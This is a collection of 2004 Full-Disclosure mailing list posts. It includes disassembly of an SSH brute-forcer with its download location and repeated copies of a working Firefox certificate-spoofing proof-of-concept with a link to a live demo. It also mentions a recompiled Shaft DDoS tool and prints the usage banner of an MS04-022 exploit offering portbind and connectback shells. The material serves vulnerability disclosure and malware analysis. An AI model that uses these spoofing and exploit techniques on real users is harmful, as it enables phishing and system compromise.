Re: [Full-Disclosure] Automated SSH login attempts?

[Jan Muenther]

Hi there,

> Agreed. The thing *is* publicly available, just do 'wget
> frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so
> far is not availability, but lacking knowledge about the ssh protocol on
> my side ;-)

Hm, actually, there's fairly little of that required to see what this beast 
does...  
Guys, I can't help but sing the praise of IDA Pro. Get it, it's worth the 
money. 

> The tool itself dos not need root rights. What needs to be root is the
> portscanner accompanying it.

Yeah, found that too. That, however, is not surprising. It's a SYN-Scanner,
using a detached scanning method, built on libnet (eh, too lazy for raw sockets,
are we) and libpcap, and its statically linked against it. Both binaries
were not stripped by the way :>

You'll need root rights for constructing packets with libnet and root rights
to set the interface into promiscuous mode for the pcap captures. 

> 
> hehe. According to a brief look at the strace of this thingy, it does
> not do anything suspicious on the local box. But maybe I should have a
> second look - who knows? 

Mkay, it really appears to be just an SSH scanner / bruteforcer, which next 
to the hardcoded username / password combinations also tries the identity / 
public key files of the current user to access other boxes. 

Some stuff from the disassembly (label names are mine, function names are from
the binary, as I said, not stripped). 

So, it first tries to open uniq.txt for its input, nothing new, and bails out
if it can't:

.text:080482E3 pushoffset aR   ; "r"
.text:080482E8 pushoffset aUniq_txt ; "uniq.txt"
.text:080482ED callfopen
.text:080482F2 add esp, 10h
.text:080482F5 mov [ebp+var_C], eax
.text:080482F8 cmp [ebp+var_C], 0
.text:080482FC jnz short loc_8048314
.text:080482FE sub esp, 0Ch
.text:08048301 pushoffset aNuPotDeschideU ; "nu pot deschide
 uniq.txt\n"
.text:08048306 callprintf

Is this romanian? Seen it a lot recently...

.text:0804835B do_it:  ; CODE XREF: main+86^Xj
.text:0804835B callfork
.text:08048360 testeax, eax
.text:08048362 jnz short loc_80483A6
.text:08048364 sub esp, 4
.text:08048367 lea eax, [ebp+var_418]
.text:0804836D pusheax
.text:0804836E pushoffset aTest; "test"
.text:08048373 pushoffset aTest; "test"
.text:08048378 callccheckauth
.text:0804837D add esp, 10h
.text:08048380 sub esp, 4
.text:08048383 lea eax, [ebp+var_418]
.text:08048389 pusheax
.text:0804838A pushoffset aGuest   ; "guest"
.text:0804838F pushoffset aGuest   ; "guest"
.text:08048394 callccheckauth
.text:08048399 add esp, 10h
.text:0804839C sub esp, 0Ch
.text:0804839F push0
.text:080483A1 callexit

Mkay, so, it forks and calls a function called ccheckauth(), giving test and
guest as parameters for the username and password variables of that function. 
Once that's done, it exits. 


So, here's that function:

text:080481E8 public ccheckauth
.text:080481E8 ccheckauth  proc near   ; CODE XREF: main+AB^Yp
.text:080481E8 ; main+C7^Yp
.text:080481E8
.text:080481E8 var_14  = dword ptr -14h
.text:080481E8 var_10  = dword ptr -10h
.text:080481E8 var_C   = dword ptr -0Ch
.text:080481E8 var_8   = dword ptr -8
.text:080481E8 var_4   = dword ptr -4
.text:080481E8 arg_0   = dword ptr  8
.text:080481E8 arg_4   = dword ptr  0Ch
.text:080481E8 arg_8   = dword ptr  10h
.text:080481E8
.text:080481E8 pushebp
.text:080481E9 mov ebp, esp
.text:080481EB sub esp, 18h
.text:080481EE mov [ebp+var_C], 1
.text:080481F5 mov [ebp+var_10], offset aNone ; "none"
.text:080481FC sub esp, 0Ch
.text:080481FF push0Fh
.text:08048201 callalarm
.text:08048206 add esp, 10h
.text:08048209 sub esp, 8
.text:08048206 add esp, 10h
.text:08048209 sub esp, 8
.text:0804820C lea eax, [ebp+var_10]
.text:0804820F pusheax
.text:08048210 lea eax, [ebp+var_C]
.text:08048213 pusheax
.text:08048214 callssh_getopt
.text:08048219 add esp, 10h
.text:0804821C mov   

Re: [Full-Disclosure] Automated SSH login attempts?

[Jan Muenther]

Hey Valdis,

> It's more likely that there's one version, making noise and very rarely finding
> a box with stupid passwords.  It's possible there's another rare version that
> tries several stupid passwords and a few old SSH vulnerabilities.  Is there
> *any* reliable evidence (even a single box) that appears to have been nailed by
> a new exploit?

Hm, as of this frauder binary, I have my strong doubts... looked at it, and 
it's a plain brute forcer / banner grabber which is statically linked against
SSH-2.0-libssh-0.1. No magic visible, at least not in the given timeframe, and 
my gut feeling is that that's it. 

> 
> I'll gladly change my mind, but it will take somebody actually finding a
> box running a *recent* SSH and had guest/test/and_so_on properly secured,
> and the attack *still* got in

I assume in the aforementioned takeovers other factors were involved. 

Cheers, J.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

[Peter Besenbruch]

Stephen Samuel wrote:
> Has this been posted to bugilla
>
>
> E.Kellinis wrote:
>
>> #
>> Application:Mozilla Firefox
>> Vendors:http://www.mozilla.com
>> Version: 0.9.1 / 0.9.2
>> Platforms:   Windows
>> Bug:   Certificate Spoofing (Phishing)
>> Risk:  High
>> Exploitation:   Remote with browser
>> Date: 25 July 2004
>> Author:  Emmanouel Kellinis
>> e-mail:   [EMAIL PROTECTED](dot)org(dot)uk
>> web:  http://www.cipher.org.uk
>> List :  BugTraq(SecurityFocus)/ Full-Disclosure
>> #
This was fixed by the July 27 builds in both Firefox 0.9.2( or 1) and 
Mozilla 1.7. The Mozilla 1.4 branch was also updated.

Bugzilla report:
http://bugzilla.mozilla.org/show_bug.cgi?id=253121

Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

[Will Beers]

I got this working on both windows and linux versions of firefox and 
mozilla, it's been submitted and patched.

http://bugzilla.mozilla.org/show_bug.cgi?id=253121
Will Beers
Juan Carlos Navea wrote:
Has anyone tried the proof of concept with a real ssl cert and get it working? 

I just tried it using two different ssl urls and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.
Can anyone confirm this? I haven't seen any mention of it on bugzilla either. 

Im using: 

0.9.2 on Windows2k
On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <[EMAIL PROTECTED]> wrote:
Has this been posted to bugilla
E.Kellinis wrote:
#
Application:Mozilla Firefox
Vendors:http://www.mozilla.com
Version: 0.9.1 / 0.9.2
Platforms:   Windows
Bug:   Certificate Spoofing (Phishing)
Risk:  High
Exploitation:   Remote with browser
Date: 25 July 2004
Author:  Emmanouel Kellinis
e-mail:   [EMAIL PROTECTED](dot)org(dot)uk
web:  http://www.cipher.org.uk
List :  BugTraq(SecurityFocus)/ Full-Disclosure
#
===
Product
===
A popular Web browser,good alternative of IE and
"The web browser" for linux machines,
used to view pages on the World Wide Web.
===
Bug
===
Firefox has caching problem, as a result of that someone can
spoof a certificate of any website and use it as his/her own.
The problem is exploited using onunload inside  < body> and
redirection using Http-equiv Refresh metatag,document.write()
and document.close()
First you direct the redirection metatag to the website
of which you want to spoof the certificate, then inside
the < body> tag you add onulnoad script so you can control
the output inside the webpage with the spoofed certificate.
After that you say to firefox, as soon as you unload this page
close the stream, aparently the stream you close is
the redirection website, you do that with
document.close().
Now you can write anything you want , you do that
using document.write(). After writing the content of you choice
you close the stream again , usually firefox wont display your content,
although if you check the source code you see it , so the last thing
is to refresh the new page (do that using window.location.reload()),
after that you have your domain name in the url field , your content
in the browser and the magic yellow Lock on the bottom left corner,
if you pass your mouse over it you will see displayed the name of
the website you spoofed the certificate, if you double click on it you
will check full information of the certificate without any warning !
You dont need to have SSL in your website ! it will work with
http.
Additional using this bug malicious websites can bypass content
filtering using SSL properties.
=
Proof Of Concept Code
=
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com";>
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
   < h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>
=
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=
--
Stephen Samuel +1(604)876-0426[EMAIL PROTECTED]
  http://www.bcgreen.com/~samuel/
   Powerful committed communication. Transformation touching
 the jewel within each person and bringing it to light.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




smime.p7s
Description: S/MIME Cryptographic Signature

RE: [Full-Disclosure] FullDisclosure: CWS removal tools

[Todd Towles]

Randall, we have discussed CWShredder. The author stopped supporting his
program and did have a list of ever variant on this website and the methods
it used. Very tricky.

He also points out it will not stop the newest version because of the
advanced survival techniques being employed. They are starting to use
roolkit like methods to hide and rebuild if damaged. CWShredder won't get
the new version and neither will any new program.

As far as malware goes, it is a lot of malware around that is never detected
by AV or Anti-spyware software or anything else for that matter. 

Sometimes humans are the best countermeasure.

Todd

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
Sent: Saturday, July 31, 2004 9:30 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] FullDisclosure: CWS removal tools

I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunetly,
the author was a student and it seems no longer can support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes absolete.
I found one link that still works but not sure if it updates anymore.
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
is some other useful links http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

[Aviv Raff]

> Has anyone tried the proof of concept with a real ssl cert and get it working? 

Yep. 
Try here: http://avivra.europe.webmatrixhosting.net/moz/certspoof1.html

> I just tried it using two different ssl urls and the page only redirected me to the 
> proper site. I did not see the output generated by document.writeln even after 
> viewing the source.

It works just fine with paypal.

> Can anyone confirm this? 

Confirmed. Using FireFox 0.9.2 on XP and Win2k3.

> I haven't seen any mention of it on bugzilla either.

It's probably checked as a security issue, therefore it's not public.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Cool Web Search Michael: take up the slack!

[RandallM]

Michael,
Very interesting that you would say you'd like to do battle. The below link
is a cashed page of the author of
CWShredder/Hijack this  who states on his web page (I could only get the
cash version
http://64.233.167.104/search?sourceid=navclient-menuext
 &q=cache:http%3A//www.spywareinfo.com/~merijn/
Home page unreachable at the moment:
http://www.spywareinfo.com/~merijn/index.html):
 
>>>
June 28, 2004:Alright, this will be my last update for a while. I have a lot
of things going on that are not spyware-related in the next few months and
frankly I find these more important than the spyware-related issues. I'm
sorry if that offends you, but I simply don't have the time to do both at
the same time. I hope you'll understand. 

July 1 2004, I will be graduating from the University of Utrecht and receive
my Masters Degree in Science (chemistry, specifically). 
September 1 2004, I will start a second study at the same university. I'm
not sure what the English name for this study is (in Dutch it's
Informatiekunde) but it's in the Computer Sciences field. 

Right now, my email inbox is overflowing with over 2700 emails which I can't
possibly answer all. These 2700 are two-thirds of about 4000, the remaining
one-third being spam and email viruses which I've already deleted. (For
god's sake people, get some decent antivirus protection, that's nearly 1300
emails from Windows systems infected with email spewing trojans.) 
>>
 
I'm sure he would have variants and stuff to help you get started.

--__--__--

Message: 34

From: "Schmidt, Michael R." <[EMAIL PROTECTED]>

To: [EMAIL PROTECTED]

Subject: RE: [Full-Disclosure] Cool Web Search

Date: Fri, 30 Jul 2004 14:10:30 -0700

I will take up arms to write a cleaner for it. I despise programs like this

Since we are talking about 30 variations does anyone know where a person can
get archived versions of all of these?

I've got a machine and the tools and know how to build the tool. I just need
to be "infected" - wow, 30 variants. That is truly ugly.

Thanks

Michael R. Schmidt

- - - -
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

[Juan Carlos Navea]

Has anyone tried the proof of concept with a real ssl cert and get it working? 

I just tried it using two different ssl urls and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.

Can anyone confirm this? I haven't seen any mention of it on bugzilla either. 

Im using: 

0.9.2 on Windows2k


On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <[EMAIL PROTECTED]> wrote:
> Has this been posted to bugilla
> 
> E.Kellinis wrote:
> > #
> > Application:Mozilla Firefox
> > Vendors:http://www.mozilla.com
> > Version: 0.9.1 / 0.9.2
> > Platforms:   Windows
> > Bug:   Certificate Spoofing (Phishing)
> > Risk:  High
> > Exploitation:   Remote with browser
> > Date: 25 July 2004
> > Author:  Emmanouel Kellinis
> > e-mail:   [EMAIL PROTECTED](dot)org(dot)uk
> > web:  http://www.cipher.org.uk
> > List :  BugTraq(SecurityFocus)/ Full-Disclosure
> > #
> >
> >
> > ===
> > Product
> > ===
> > A popular Web browser,good alternative of IE and
> > "The web browser" for linux machines,
> > used to view pages on the World Wide Web.
> >
> > ===
> > Bug
> > ===
> >
> > Firefox has caching problem, as a result of that someone can
> > spoof a certificate of any website and use it as his/her own.
> > The problem is exploited using onunload inside  < body> and
> > redirection using Http-equiv Refresh metatag,document.write()
> > and document.close()
> >
> > First you direct the redirection metatag to the website
> > of which you want to spoof the certificate, then inside
> > the < body> tag you add onulnoad script so you can control
> > the output inside the webpage with the spoofed certificate.
> >
> > After that you say to firefox, as soon as you unload this page
> > close the stream, aparently the stream you close is
> > the redirection website, you do that with
> > document.close().
> >
> > Now you can write anything you want , you do that
> > using document.write(). After writing the content of you choice
> > you close the stream again , usually firefox wont display your content,
> > although if you check the source code you see it , so the last thing
> > is to refresh the new page (do that using window.location.reload()),
> > after that you have your domain name in the url field , your content
> > in the browser and the magic yellow Lock on the bottom left corner,
> > if you pass your mouse over it you will see displayed the name of
> > the website you spoofed the certificate, if you double click on it you
> > will check full information of the certificate without any warning !
> >
> > You dont need to have SSL in your website ! it will work with
> > http.
> >
> > Additional using this bug malicious websites can bypass content
> > filtering using SSL properties.
> >
> >
> > =
> > Proof Of Concept Code
> > =
> >
> > < HTML>
> > < HEAD>
> > < TITLE>Spoofer< /TITLE>
> > < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com";>
> > < /HEAD>
> > < BODY
> > onunload="
> > document.close();
> > document.writeln('< body onload=document.close();break;>
> > < h3>It is Great to Use example's Cert!');
> >
> > document.close();
> > window.location.reload();
> > ">
> > < /body>
> >
> >
> > =
> > *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
> > =
> 
> --
> Stephen Samuel +1(604)876-0426[EMAIL PROTECTED]
>http://www.bcgreen.com/~samuel/
> Powerful committed communication. Transformation touching
>   the jewel within each person and bringing it to light.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


-- 
http://scott.telnetd.com/loco/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] FullDisclosure: CWS removal tools

[RandallM]

I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunetly,
the author was a student and it seems no longer can support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes absolete.
I found one link that still works but not sure if it updates anymore.
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
is some other useful links http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] [Paper] Designing secure desktop operating system

[Todd Towles]

Fedora Core 2 from Red Hat is free and includes SELinux. Anyone been using
the test release of FC3?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Timo Sirainen
Sent: Saturday, July 31, 2004 4:16 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] [Paper] Designing secure desktop operating system

[possibly somewhat off-topic here, [EMAIL PROTECTED] can be used
for discussion about it]

I've written down some ideas how I think it would be possible to
implement easy to use and quite secure graphical user interface and
operating system around it to make it possible. It's available at
http://iki.fi/tss/security/os.html

Currently I'd be very interested about hearing comments why my ideas
simply wouldn't work with certain kind of software or would be just too
much pain. Or some other fundemental technical problem why this could
never work. Or more positively, people who would be willing to
participate in more complete design or implementation.

To avoid too many replies for issues that are either addressed there or
aren't exactly relevant, please don't reply if you're only going to:

 - suggest using SELinux, Java sandboxes or similar (yes, maybe based on
them, that's not the point)
 - say how sandboxing limits usability and it would never be user-
friendly (it could)
 - say how user-friendliness and security are always mutually exclusive
(they're not)
 - say how it's going to be too difficult to users to keep updating
access control lists to run software they want (it's not needed)
 - confuse operating system with kernel (OS is more than just kernel)
 - say how no matter how "secure" you're trying to be, some people will
always bypass it and hurt themselves/others (yes, it's true for home
users)

I've heard all of those too many times already and I think they're all
answered well enough in the paper.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Security Web Site Hosting

[CrYpTiC MauleR]

- Original Message -
From: [EMAIL PROTECTED] (Simon Richter)
Date: Fri, 30 Jul 2004 23:23:08 +0200
To: n30 <[EMAIL PROTECTED]>
Subject: Re: [Full-Disclosure] Security Web Site Hosting

> Hi,
> 
> > Any recommendations on site hosting services / Portal framewroks / site
> > builders...
> 
> I've heard PHPNuke is pretty solid.
> 
>Simon
> 
> -- 
> GPG Fingerprint: 040E B5F7 84F1 4FBC CEAD  ADC6 18A0 CC8D 5706 A4B4
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html



PHP-Nuke? That is as bad as using IIS. PHP-Nuke has so many XSS, SQL Injection etc 
vulns found all the time. Unless you want your site hacked dont use that. If at all 
settling for a 'nuke' CMS use Post-Nuke or CPG-Nuke.


Regards,
CM
-- 
__
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Appliance-based security gateway?

[Eric Scher]

in-reply-to: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
references: <[EMAIL PROTECTED]>
Return-Path: : [EMAIL PROTECTED]

..
..
..



A few colleagues and I started a discussion as to why 
one should or shouldn't buy an appliance-based firewall, 
ids/ips or other security appliance instead of installing 
software on a server. 

We thought about patching, performance, and other 
reason for each option but I'd like to hear what other 
people think.

I would really appreciate if you could share your 
thoughts with me.

Thanks in advance,

Bernardo Santos Wernesback

===


Ultimately, anything you place at the edge is going to be an appliance.
Maybe it'll be something by Cisco, perhaps a decommission desktop 
running IP Tables, or even one of those fancy new boxes that's supposed
to make life easy for inexperienced admins. It's still essentially an appliance.

But what to use?  That's really the essence of the question.

I saw a car show many years ago that was doing a segment waxing,
and the host asked his guest what he recommends. 
The guest replied; "Whatever you're actually going to use"
The best wax in the world wont protect your car if it sits on the shelf.
The worst wax WILL protect your car, if it's actualy ON the car.

So for those admins that feel comfortable with something that requires a lot of
interaction, and have the time for it, then one of the more user intensive and complex
choices would be better. 

If not, get something that will make your life easier, because a security solution only
secures you when it's being used.

..
..
..

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Shaft DDOS

[mohr]

If you're gonna distribute source code, please ensure that it will compile 
with a modern complier!!

I understand that this may have been posted as a historical document (it 
is dated from 2000), but really.

My amateurish C isn't advanced enough to fix everything in shaftnode, but 
I did try to fix up genstuff & shaftmaster as best I could, and added a 
makefile.

On Thu, 29 Jul 2004 [EMAIL PROTECTED] wrote:
Shaft Denial of Service TOOL
-japboy


Shaft-DDOS.tar.gz
Description: Shaft-DDOS - fixed?

[Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

[Stephen Samuel]

Has this been posted to bugilla
E.Kellinis wrote:
#
Application:Mozilla Firefox
Vendors:http://www.mozilla.com
Version: 0.9.1 / 0.9.2
Platforms:   Windows
Bug:   Certificate Spoofing (Phishing)
Risk:  High
Exploitation:   Remote with browser
Date: 25 July 2004
Author:  Emmanouel Kellinis
e-mail:   [EMAIL PROTECTED](dot)org(dot)uk
web:  http://www.cipher.org.uk
List :  BugTraq(SecurityFocus)/ Full-Disclosure
#
===
Product
===
A popular Web browser,good alternative of IE and 
"The web browser" for linux machines,
used to view pages on the World Wide Web.

===
Bug
===
Firefox has caching problem, as a result of that someone can 
spoof a certificate of any website and use it as his/her own.
The problem is exploited using onunload inside  < body> and 
redirection using Http-equiv Refresh metatag,document.write()
and document.close()

First you direct the redirection metatag to the website 
of which you want to spoof the certificate, then inside 
the < body> tag you add onulnoad script so you can control
the output inside the webpage with the spoofed certificate.

After that you say to firefox, as soon as you unload this page 
close the stream, aparently the stream you close is 
the redirection website, you do that with 
document.close().

Now you can write anything you want , you do that 
using document.write(). After writing the content of you choice
you close the stream again , usually firefox wont display your content,
although if you check the source code you see it , so the last thing 
is to refresh the new page (do that using window.location.reload()), 
after that you have your domain name in the url field , your content 
in the browser and the magic yellow Lock on the bottom left corner, 
if you pass your mouse over it you will see displayed the name of 
the website you spoofed the certificate, if you double click on it you 
will check full information of the certificate without any warning !

You dont need to have SSL in your website ! it will work with 
http.

Additional using this bug malicious websites can bypass content 
filtering using SSL properties.

=
Proof Of Concept Code
=
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com";>
< /HEAD>
< BODY 
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');

document.close();
window.location.reload();
">
< /body>
=
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=

--
Stephen Samuel +1(604)876-0426[EMAIL PROTECTED]
   http://www.bcgreen.com/~samuel/
   Powerful committed communication. Transformation touching
 the jewel within each person and bringing it to light.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [Paper] Designing secure desktop operating system

[Timo Sirainen]

[possibly somewhat off-topic here, [EMAIL PROTECTED] can be used
for discussion about it]

I've written down some ideas how I think it would be possible to
implement easy to use and quite secure graphical user interface and
operating system around it to make it possible. It's available at
http://iki.fi/tss/security/os.html

Currently I'd be very interested about hearing comments why my ideas
simply wouldn't work with certain kind of software or would be just too
much pain. Or some other fundemental technical problem why this could
never work. Or more positively, people who would be willing to
participate in more complete design or implementation.

To avoid too many replies for issues that are either addressed there or
aren't exactly relevant, please don't reply if you're only going to:

 - suggest using SELinux, Java sandboxes or similar (yes, maybe based on
them, that's not the point)
 - say how sandboxing limits usability and it would never be user-
friendly (it could)
 - say how user-friendliness and security are always mutually exclusive
(they're not)
 - say how it's going to be too difficult to users to keep updating
access control lists to run software they want (it's not needed)
 - confuse operating system with kernel (OS is more than just kernel)
 - say how no matter how "secure" you're trying to be, some people will
always bypass it and hurt themselves/others (yes, it's true for home
users)

I've heard all of those too many times already and I think they're all
answered well enough in the paper.



signature.asc
Description: This is a digitally signed message part

Re: [Full-Disclosure] Crack Microsoft Office encryption

[Laurent LEVIER]

Hi,
At 05:25 31/07/2004, Raj Mathur wrote:
Anyone have pointers to a free (open source) tool or methodology to
crack MS Office encrypted files?  Both brute-force and smarter methods
are fine, smarter preferred, of course :)
I know no one FREE, but the serie from  Elcomsoft 
(http://www.elcomsoft.com) works pretty well.

Hope this helps
Brgrds
Laurent LEVIER
Systems & Networks Security Expert, CISSP CISM
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Cool Web Search

[Denis McMahon]

Dean Porter wrote:
Has any one dealt with a similar thing called "searchweb2.com"? 
Nope, but as a general fallback on windows systems that have and ebd 
that gives a dos console:

1) identify the elements you need to remove on the live system.
2) boot the ebd and use the ebd tools to remove the unwanted items.
3) reboot without the ebd and check all the stuff you wanted to remove 
has gone.

Denis
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit

[pigrelax]

Hi all!

Microsoft Windows XP Task Scheduler (.job) Universal Exploit

* Tested on:
 *- Internet Explorer 6.0 (SP1) (iexplore.exe)
 *- Explorer (explorer.exe)
 *- Windows XP SP0, SP1
 *
 * ---
 * Compile:
 *Win32/VC++  : cl HOD-ms04022-task-expl.c
 *Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
 *Linux   : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
 *
 * ---
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe[connectback IP]
 *
 *   Shellcode:
 *1 - Portbind shellcode
 *2 - Connectback shellcode
 *
 * ---
 * Example:
 *
 * C:\>HOD-ms04022-task-expl.exe expl.job 1 
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * --- Coded by .::[ houseofdabus ]::. ---
 *
 * [*] Shellcode: Portbind, port = 
 * [*] Generate file: expl.job
 *
 * C:\>
 *
 * start IE -> C:\
 *
 * C:\>telnet localhost 
 * Microsoft Windows XP [‚ҐабЁп 5.1.2600]
 * (‘) Љ®аЇ®а жЁп Њ ©Єа®б®дв, 1985-2001.
 *
 * C:\Documents and Settings\v.X\ђ Ў®зЁ© бв®«>
 *


http://www.securitylab.ru/46820.html

………
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
http://www.Maxpatrol.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html